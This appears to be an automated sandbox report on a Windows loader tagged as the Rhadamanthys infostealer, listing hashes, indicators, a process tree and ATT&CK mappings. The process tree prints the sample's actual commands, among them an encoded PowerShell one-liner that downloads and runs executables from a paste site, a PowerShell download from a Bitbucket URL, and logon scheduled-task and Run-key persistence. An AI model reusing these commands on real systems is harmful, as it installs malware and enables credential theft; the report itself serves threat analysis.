Analysis
-
max time kernel
21s -
max time network
32s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
12-06-2024 06:36
Static task
static1
Behavioral task
behavioral1
Sample
Loader.exe
Resource
win10-20240404-en
General
-
Target
Loader.exe
-
Size
7KB
-
MD5
b5e479d3926b22b59926050c29c4e761
-
SHA1
a456cc6993d12abe6c44f2d453d7ae5da2029e24
-
SHA256
fbc4058b92d9bc4dda2dbc64cc61d0b3f193415aad15c362a5d87c90ca1be30b
-
SHA512
09d1aa9b9d7905c37b76a6b697de9f2230219e7f51951654de73b0ad47b8bb8f93cf63aa4688a958477275853b382a2905791db9dcb186cad7f96015b2909fe8
-
SSDEEP
192:q+yk9cqvjX3xszdzztCbxbsIcaqc2Ng5vGIcaBSNtUqOwciQjdv:Tyk9Hv1O/Cbxbbcaqc2NidcaANt/dcio
Malware Config
Extracted
https://rentry.org/lem61111111111/raw
Extracted
https://bitbucket.org/interception1/interception/raw/93e92759abfc60711b71f1aca42d714cee0c37c0/L.tar
Signatures
-
Rhadamanthys
Rhadamanthys is an info stealer written in C++ first seen in August 2022.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
ljmfrqdk.g5r2.exedescription pid process target process PID 1680 created 3016 1680 ljmfrqdk.g5r2.exe sihost.exe -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exeflow pid process 2 4848 powershell.exe 4 4848 powershell.exe 11 824 powershell.exe 13 4268 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepid process 4848 powershell.exe 4268 powershell.exe 824 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 5 IoCs
Processes:
ljmfrqdk.g5r0.exeljmfrqdk.g5r1.exeljmfrqdk.g5r2.exeljmfrqdk.g5r3.exeljmfrqdk.g5r4.exepid process 5000 ljmfrqdk.g5r0.exe 4908 ljmfrqdk.g5r1.exe 1680 ljmfrqdk.g5r2.exe 4164 ljmfrqdk.g5r3.exe 2052 ljmfrqdk.g5r4.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
ljmfrqdk.g5r4.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe" ljmfrqdk.g5r4.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 7 api.ipify.org 8 api.ipify.org -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exepowershell.exepowershell.exeljmfrqdk.g5r2.exedialer.exepid process 4848 powershell.exe 4848 powershell.exe 4848 powershell.exe 824 powershell.exe 824 powershell.exe 824 powershell.exe 4268 powershell.exe 4268 powershell.exe 4268 powershell.exe 1680 ljmfrqdk.g5r2.exe 1680 ljmfrqdk.g5r2.exe 4488 dialer.exe 4488 dialer.exe 4488 dialer.exe 4488 dialer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exeljmfrqdk.g5r4.exewmic.exepowershell.exedescription pid process Token: SeDebugPrivilege 4848 powershell.exe Token: SeIncreaseQuotaPrivilege 4848 powershell.exe Token: SeSecurityPrivilege 4848 powershell.exe Token: SeTakeOwnershipPrivilege 4848 powershell.exe Token: SeLoadDriverPrivilege 4848 powershell.exe Token: SeSystemProfilePrivilege 4848 powershell.exe Token: SeSystemtimePrivilege 4848 powershell.exe Token: SeProfSingleProcessPrivilege 4848 powershell.exe Token: SeIncBasePriorityPrivilege 4848 powershell.exe Token: SeCreatePagefilePrivilege 4848 powershell.exe Token: SeBackupPrivilege 4848 powershell.exe Token: SeRestorePrivilege 4848 powershell.exe Token: SeShutdownPrivilege 4848 powershell.exe Token: SeDebugPrivilege 4848 powershell.exe Token: SeSystemEnvironmentPrivilege 4848 powershell.exe Token: SeRemoteShutdownPrivilege 4848 powershell.exe Token: SeUndockPrivilege 4848 powershell.exe Token: SeManageVolumePrivilege 4848 powershell.exe Token: 33 4848 powershell.exe Token: 34 4848 powershell.exe Token: 35 4848 powershell.exe Token: 36 4848 powershell.exe Token: SeDebugPrivilege 2052 ljmfrqdk.g5r4.exe Token: SeIncreaseQuotaPrivilege 4504 wmic.exe Token: SeSecurityPrivilege 4504 wmic.exe Token: SeTakeOwnershipPrivilege 4504 wmic.exe Token: SeLoadDriverPrivilege 4504 wmic.exe Token: SeSystemProfilePrivilege 4504 wmic.exe Token: SeSystemtimePrivilege 4504 wmic.exe Token: SeProfSingleProcessPrivilege 4504 wmic.exe Token: SeIncBasePriorityPrivilege 4504 wmic.exe Token: SeCreatePagefilePrivilege 4504 wmic.exe Token: SeBackupPrivilege 4504 wmic.exe Token: SeRestorePrivilege 4504 wmic.exe Token: SeShutdownPrivilege 4504 wmic.exe Token: SeDebugPrivilege 4504 wmic.exe Token: SeSystemEnvironmentPrivilege 4504 wmic.exe Token: SeRemoteShutdownPrivilege 4504 wmic.exe Token: SeUndockPrivilege 4504 wmic.exe Token: SeManageVolumePrivilege 4504 wmic.exe Token: 33 4504 wmic.exe Token: 34 4504 wmic.exe Token: 35 4504 wmic.exe Token: 36 4504 wmic.exe Token: SeDebugPrivilege 824 powershell.exe Token: SeIncreaseQuotaPrivilege 4504 wmic.exe Token: SeSecurityPrivilege 4504 wmic.exe Token: SeTakeOwnershipPrivilege 4504 wmic.exe Token: SeLoadDriverPrivilege 4504 wmic.exe Token: SeSystemProfilePrivilege 4504 wmic.exe Token: SeSystemtimePrivilege 4504 wmic.exe Token: SeProfSingleProcessPrivilege 4504 wmic.exe Token: SeIncBasePriorityPrivilege 4504 wmic.exe Token: SeCreatePagefilePrivilege 4504 wmic.exe Token: SeBackupPrivilege 4504 wmic.exe Token: SeRestorePrivilege 4504 wmic.exe Token: SeShutdownPrivilege 4504 wmic.exe Token: SeDebugPrivilege 4504 wmic.exe Token: SeSystemEnvironmentPrivilege 4504 wmic.exe Token: SeRemoteShutdownPrivilege 4504 wmic.exe Token: SeUndockPrivilege 4504 wmic.exe Token: SeManageVolumePrivilege 4504 wmic.exe Token: 33 4504 wmic.exe Token: 34 4504 wmic.exe -
Suspicious use of WriteProcessMemory 56 IoCs
Processes:
Loader.exepowershell.exeljmfrqdk.g5r0.exeljmfrqdk.g5r1.execmd.exeljmfrqdk.g5r4.execmd.execmd.execmd.exeljmfrqdk.g5r2.exedescription pid process target process PID 1448 wrote to memory of 4848 1448 Loader.exe powershell.exe PID 1448 wrote to memory of 4848 1448 Loader.exe powershell.exe PID 4848 wrote to memory of 5000 4848 powershell.exe ljmfrqdk.g5r0.exe PID 4848 wrote to memory of 5000 4848 powershell.exe ljmfrqdk.g5r0.exe PID 4848 wrote to memory of 5000 4848 powershell.exe ljmfrqdk.g5r0.exe PID 4848 wrote to memory of 4908 4848 powershell.exe ljmfrqdk.g5r1.exe PID 4848 wrote to memory of 4908 4848 powershell.exe ljmfrqdk.g5r1.exe PID 4848 wrote to memory of 4908 4848 powershell.exe ljmfrqdk.g5r1.exe PID 4848 wrote to memory of 1680 4848 powershell.exe ljmfrqdk.g5r2.exe PID 4848 wrote to memory of 1680 4848 powershell.exe ljmfrqdk.g5r2.exe PID 4848 wrote to memory of 1680 4848 powershell.exe ljmfrqdk.g5r2.exe PID 4848 wrote to memory of 4164 4848 powershell.exe ljmfrqdk.g5r3.exe PID 4848 wrote to memory of 4164 4848 powershell.exe ljmfrqdk.g5r3.exe PID 4848 wrote to memory of 2052 4848 powershell.exe ljmfrqdk.g5r4.exe PID 4848 wrote to memory of 2052 4848 powershell.exe ljmfrqdk.g5r4.exe PID 5000 wrote to memory of 4540 5000 ljmfrqdk.g5r0.exe cmd.exe PID 4908 wrote to memory of 596 4908 ljmfrqdk.g5r1.exe cmd.exe PID 5000 wrote to memory of 4540 5000 ljmfrqdk.g5r0.exe cmd.exe PID 4908 wrote to memory of 596 4908 ljmfrqdk.g5r1.exe cmd.exe PID 4540 wrote to memory of 5060 4540 cmd.exe chcp.com PID 4540 wrote to memory of 5060 4540 cmd.exe chcp.com PID 2052 wrote to memory of 2060 2052 ljmfrqdk.g5r4.exe attrib.exe PID 2052 wrote to memory of 2060 2052 ljmfrqdk.g5r4.exe attrib.exe PID 596 wrote to memory of 4548 596 cmd.exe where.exe PID 596 wrote to memory of 4548 596 cmd.exe where.exe PID 4540 wrote to memory of 992 4540 cmd.exe findstr.exe PID 4540 wrote to memory of 992 4540 cmd.exe findstr.exe PID 2052 wrote to memory of 1292 2052 ljmfrqdk.g5r4.exe attrib.exe PID 2052 wrote to memory of 1292 2052 ljmfrqdk.g5r4.exe attrib.exe PID 2052 wrote to memory of 4504 2052 ljmfrqdk.g5r4.exe wmic.exe PID 2052 wrote to memory of 4504 2052 ljmfrqdk.g5r4.exe wmic.exe PID 4540 wrote to memory of 1104 4540 cmd.exe findstr.exe PID 4540 wrote to memory of 1104 4540 cmd.exe findstr.exe PID 596 wrote to memory of 824 596 cmd.exe powershell.exe PID 596 wrote to memory of 824 596 cmd.exe powershell.exe PID 4540 wrote to memory of 2612 4540 cmd.exe findstr.exe PID 4540 wrote to memory of 2612 4540 cmd.exe findstr.exe PID 4540 wrote to memory of 1884 4540 cmd.exe schtasks.exe PID 4540 wrote to memory of 1884 4540 cmd.exe schtasks.exe PID 4540 wrote to memory of 3652 4540 cmd.exe schtasks.exe PID 4540 wrote to memory of 3652 4540 cmd.exe schtasks.exe PID 4540 wrote to memory of 5100 4540 cmd.exe cmd.exe PID 4540 wrote to memory of 5100 4540 cmd.exe cmd.exe PID 5100 wrote to memory of 2040 5100 cmd.exe reg.exe PID 5100 wrote to memory of 2040 5100 cmd.exe reg.exe PID 4540 wrote to memory of 4208 4540 cmd.exe cmd.exe PID 4540 wrote to memory of 4208 4540 cmd.exe cmd.exe PID 4208 wrote to memory of 68 4208 cmd.exe reg.exe PID 4208 wrote to memory of 68 4208 cmd.exe reg.exe PID 4540 wrote to memory of 4268 4540 cmd.exe powershell.exe PID 4540 wrote to memory of 4268 4540 cmd.exe powershell.exe PID 1680 wrote to memory of 4488 1680 ljmfrqdk.g5r2.exe dialer.exe PID 1680 wrote to memory of 4488 1680 ljmfrqdk.g5r2.exe dialer.exe PID 1680 wrote to memory of 4488 1680 ljmfrqdk.g5r2.exe dialer.exe PID 1680 wrote to memory of 4488 1680 ljmfrqdk.g5r2.exe dialer.exe PID 1680 wrote to memory of 4488 1680 ljmfrqdk.g5r2.exe dialer.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 2060 attrib.exe 1292 attrib.exe
Processes
-
c:\windows\system32\sihost.exesihost.exe1⤵
-
C:\Windows\SysWOW64\dialer.exe"C:\Windows\system32\dialer.exe"2⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAagBpACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAZwBhAHAAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBrAGQAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAaABlAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBlAG4AdAByAHkALgBvAHIAZwAvAGwAZQBtADYAMQAxADEAMQAxADEAMQAxADEAMQAvAHIAYQB3ACcAKQAuAFMAcABsAGkAdAAoAFsAcwB0AHIAaQBuAGcAWwBdAF0AIgBgAHIAYABuACIALAAgAFsAUwB0AHIAaQBuAGcAUwBwAGwAaQB0AE8AcAB0AGkAbwBuAHMAXQA6ADoATgBvAG4AZQApADsAIAAkAGYAbgAgAD0AIABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AUABhAHQAaABdADoAOgBHAGUAdABSAGEAbgBkAG8AbQBGAGkAbABlAE4AYQBtAGUAKAApADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIAAkAHcAYwAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJABsAG4AawBbACQAaQBdACwAIAA8ACMAbgBtAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBjAHAAZwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAQQBwAHAARABhAHQAYQAgADwAIwBqAGkAZwAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQApACAAfQA8ACMAYgB3AGYAIwA+ADsAIABmAG8AcgAgACgAJABpAD0AMAA7ACAAJABpACAALQBsAHQAIAAkAGwAbgBrAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAbgB6AHoAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHEAdQBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAoACQAZgBuACAAKwAgACQAaQAuAFQAbwBTAHQAcgBpAG4AZwAoACkAIAArACAAJwAuAGUAeABlACcAKQApACAAfQAgADwAIwBpAGQAegAjAD4A"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r0.exe"C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r0.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7F53.tmp\7F53.tmp\7F54.bat C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r0.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 12515⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 store.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"5⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 steamcommunity.com" "C:\Windows\System32\drivers\etc\hosts"5⤵
-
C:\Windows\system32\findstr.exefindstr /c:"127.0.0.1 help.steampowered.com" "C:\Windows\System32\drivers\etc\hosts"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /query /tn "MyBatchScript"5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "MyBatchScript" /tr "\"C:\Users\Admin\AppData\Roaming\runHidden.vbs\"" /sc onlogon /rl highest /f5⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Valve\Steam" /v SteamPath6⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Desktop6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://bitbucket.org/interception1/interception/raw/93e92759abfc60711b71f1aca42d714cee0c37c0/L.tar', 'C:\Users\Admin\AppData\Local\Temp\downloaded_archive.rar')"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r1.exe"C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r1.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7F52.tmp\7F53.tmp\7F54.bat C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r1.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\where.exewhere node5⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://nodejs.org/dist/v20.12.2/node-v20.12.2-x64.msi' -OutFile 'nodejs-installer.msi'"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r2.exe"C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r2.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r3.exe"C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r3.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r4.exe"C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r4.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r4.exe4⤵
- Views/modifies file attributes
-
C:\Windows\system32\attrib.exeattrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe4⤵
- Views/modifies file attributes
-
C:\Windows\System32\Wbem\wmic.exewmic csproduct get UUID4⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD591897de07fcb115c5f42cf4c7a984982
SHA14903ea814fed6c31b62b394cc9eb024d107b1834
SHA256bb34e4a3e0dd9623e77f569dbd0093b19dd43e91bb911dc7758e09fb4a53f789
SHA51254fbd604758c7bc66151018d18bdb140d26e8dcc5d03e974197b0f3b63946eb338bf323f80b4a3e02fd109337cc1c7c8389eb15b17e0d55fced35a0398efcf4b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD545d62890ffc360398bca85751bac0ade
SHA168f3f439c4a1f5cb02073d4af55c6854bd775e95
SHA25666cff04910713a4690f24354994e974bb08fc5a0379b8c4eb48d134bb5a84e74
SHA5123d07a452094aa55035e3d6d0970d0cb332f6d3f1c0c2c8667c71b98f9b280dae17709b7340ac5a47c76b44e86b7a21181d410f5c922a4aaf73717c6d45a07e29
-
C:\Users\Admin\AppData\Local\Temp\7F52.tmp\7F53.tmp\7F54.batFilesize
1KB
MD5c767a4ce4fc8d490fb2af1daa95a84c6
SHA1a198c337f2f3eac7ea75ed82f6a765e2f8bcda92
SHA256c2fdf52cc1547c64a984e5e04b13d2fbd4a8e7b4c8f7d738f1c8618c9fe0613c
SHA512cbcc782ea2af0594ed15cfcf243d22da61d27b63ec7e6dc6f394c891efd398fc64690dbeb944213c7f8f8d6589e75adc8f55c87aec8515422d51ccc5a479851f
-
C:\Users\Admin\AppData\Local\Temp\7F53.tmp\7F53.tmp\7F54.batFilesize
6KB
MD5b5d0441990b0eb32503744dc54199f44
SHA1ff62e8b4ffb31d7d441fa65f8603946a2c0fea7a
SHA25605bea0edc97f37ea1fb3d4ed27b1c8a372918338e98855f45cdd414d7777fc1c
SHA512a698b650a94eba4a99336c2afa472ccc89bc22c50ee486f8cdffd96c77935bae2180166eac99e6aa5ca86a1c784259ad13311a5404a2df889d392f34139fcff5
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_22ys433f.oz1.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r0.exeFilesize
94KB
MD56460dff2e792fd74bfc7db3d8c747a58
SHA15a395e8f069c17b3f9cfd6a663ca60512b628142
SHA2561656c23a4f17b821d523293ff4ba84b2c66a11db761782a774dd47b4c8c7667f
SHA512808ba395708c5d0a4ebe4ca8d1a4f2011abae61c0d2a36f84af7d097ddba7262c220def4fbfc86881db52b0189f008c5f7de39574f26b3bdfb2e5b10c29eb1a9
-
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r1.exeFilesize
88KB
MD5c4b307c1aeca9d40de4b8ef5a7299c85
SHA1ea7e1d5a5ef83a0f2ce119a56b441493dd1dd5bd
SHA25656374adc264aa171a8804dbc071ec959f71d54aeefd824d16e2a2e7a427cecac
SHA5122fce556f6ac9d005dd62907e5c852a91a0b7f777f68a1946a3ceb27440a4457de3952e25dd2e35e62474fe8ab0df1cb10a2a92b699fec776364bec54d4565bfb
-
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r2.exeFilesize
355KB
MD5c93d65bc0ed7ee88d266b4be759301f8
SHA18c0c415ba824737c61904676e7132094f5710099
SHA256f9d1a3b43fdeca1691af785f6bdfb445c224e46e58be9d27ba4d77801ef2183f
SHA5127a66f73d0d4ebd3eb160f87842883d427a3a85a75cb716db96b27670f2c96e75bf396fa2ac65f05413c1a7f16d961d242676320228e1d0c805318a88236f55f1
-
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r3.exeFilesize
5.2MB
MD5f55fc8c32bee8f7b2253298f0a0012ba
SHA1574c7a8f3eb378c03f58bc96252769296b20970e
SHA256cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9
SHA512c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a
-
C:\Users\Admin\AppData\Roaming\ljmfrqdk.g5r4.exeFilesize
9.5MB
MD5b8c70bbe49951cb98becf2fc0bce3b7b
SHA19c22bea97baabb2b9a216a9cd2fce6b090338b06
SHA2562835b997c97408baa0da7326c63278207bcb5637f6ecb2ba70b3036092e96bc6
SHA5126b305a8a12f2ddc43af26869c9660007a190bae263f52efc7c7c398aa0756bb49087ab308270634171cc85d12506b310c28b1b63bcd7bc7f6477931f9a6edfb4
-
memory/1448-1-0x0000000000740000-0x0000000000748000-memory.dmpFilesize
32KB
-
memory/1448-0-0x00007FFE9BC73000-0x00007FFE9BC74000-memory.dmpFilesize
4KB
-
memory/1680-162-0x00000000772F0000-0x00000000774B2000-memory.dmpFilesize
1.8MB
-
memory/1680-164-0x0000000001260000-0x00000000012CD000-memory.dmpFilesize
436KB
-
memory/1680-91-0x0000000001260000-0x00000000012CD000-memory.dmpFilesize
436KB
-
memory/1680-160-0x00007FFEB7AE0000-0x00007FFEB7CBB000-memory.dmpFilesize
1.9MB
-
memory/1680-159-0x0000000000E40000-0x0000000001240000-memory.dmpFilesize
4.0MB
-
memory/1680-158-0x0000000000E40000-0x0000000001240000-memory.dmpFilesize
4.0MB
-
memory/4488-163-0x00000000009D0000-0x00000000009D9000-memory.dmpFilesize
36KB
-
memory/4488-166-0x0000000004A20000-0x0000000004E20000-memory.dmpFilesize
4.0MB
-
memory/4488-167-0x00007FFEB7AE0000-0x00007FFEB7CBB000-memory.dmpFilesize
1.9MB
-
memory/4488-169-0x00000000772F0000-0x00000000774B2000-memory.dmpFilesize
1.8MB
-
memory/4848-9-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmpFilesize
9.9MB
-
memory/4848-7-0x000002C226F00000-0x000002C226F22000-memory.dmpFilesize
136KB
-
memory/4848-11-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmpFilesize
9.9MB
-
memory/4848-12-0x000002C23F220000-0x000002C23F296000-memory.dmpFilesize
472KB
-
memory/4848-108-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmpFilesize
9.9MB
-
memory/4848-26-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmpFilesize
9.9MB
-
memory/4848-13-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmpFilesize
9.9MB
-
memory/4848-49-0x00007FFE9BC70000-0x00007FFE9C65C000-memory.dmpFilesize
9.9MB